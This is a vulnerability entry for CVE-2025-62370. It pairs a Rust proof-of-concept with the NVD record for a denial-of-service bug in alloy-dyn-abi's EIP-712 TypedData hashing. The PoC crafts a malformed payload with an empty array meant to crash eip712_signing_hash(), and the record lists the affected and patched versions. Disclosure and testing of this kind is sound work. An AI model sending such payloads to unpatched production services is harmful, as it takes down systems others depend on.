CVE-2025-62370

// CVE-2025-62370 PoC - Triggering DoS via malformed TypedData in alloy-dyn_abi // This PoC demonstrates how to craft a malicious EIP-712 TypedData payload // that triggers an uncaught panic in eip712_signing_hash() due to empty array access. use alloy_dyn_abi::TypedData; use serde_json::json; fn trigger_panic() { // Construct a malformed TypedData with an empty array field // The empty array will cause eip712_signing_hash() to panic // when attempting to access the first element let malformed_data = json!({ "types": { "EIP712Domain": [ {"name": "name", "type": "string"}, {"name": "version", "type": "string"}, {"name": "chainId", "type": "uint256"}, {"name": "verifyingContract", "type": "address"} ], "Mail": [ {"name": "contents", "type": "string"}, {"name": "emptyArray", "type": "uint256[]"} ] }, "primaryType": "Mail", "domain": { "name": "Example", "version": "1", "chainId": 1, "verifyingContract": "0x0000000000000000000000000000000000000000" }, "message": { "contents": "Hello", // The empty array triggers the panic in eip712_signing_hash() "emptyArray": [] } }); let typed_data: TypedData = serde_json::from_value(malformed_data).unwrap(); // This call will trigger an uncaught panic, causing DoS let _hash = typed_data.eip712_signing_hash().unwrap(); } fn main() { // In a vulnerable version (< 0.8.26 or < 1.4.1), this will crash the process trigger_panic(); println!("This line will never be reached on vulnerable versions"); }

{"cve": {"id": "CVE-2025-62370", "sourceIdentifier": "[email protected]", "published": "2025-10-15T16:15:36.183", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Alloy Core libraries at the root of the Rust Ethereum ecosystem. Prior to 0.8.26 and 1.4.1, an uncaught panic triggered by malformed input to alloy_dyn_abi::TypedData could lead to a denial-of-service (DoS) via eip712_signing_hash(). Software with high availability requirements such as network services may be particularly impacted. If in use, external auto-restarting mechanisms can partially mitigate the availability issues unless repeated attacks are possible. The vulnerability was patched by adding a check to ensure the element is not empty before accessing its first element; an error is returned if it is empty. The fix is included in version v1.4.1 and backported to v0.8.26."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-248"}]}], "references": [{"url": "https://crates.io/crates/alloy-dyn-abi/0.8.26", "source": "[email protected]"}, {"url": "https://crates.io/crates/alloy-dyn-abi/1.4.1", "source": "[email protected]"}, {"url": "https://github.com/alloy-rs/core/commit/7823e9af8c20e9fcfb5360f5eafd891c457ebccf", "source": "[email protected]"}, {"url": "https://github.com/alloy-rs/core/security/advisories/GHSA-pgp9-98jm-wwq2", "source": "[email protected]"}, {"url": "https://rustsec.org/advisories/RUSTSEC-2025-0073.html", "source": "[email protected]"}]}}